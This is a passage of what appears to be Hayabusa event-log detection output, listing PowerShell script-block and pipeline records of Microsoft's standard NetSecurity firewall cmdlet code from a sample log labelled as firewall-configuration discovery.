-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallAddressFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 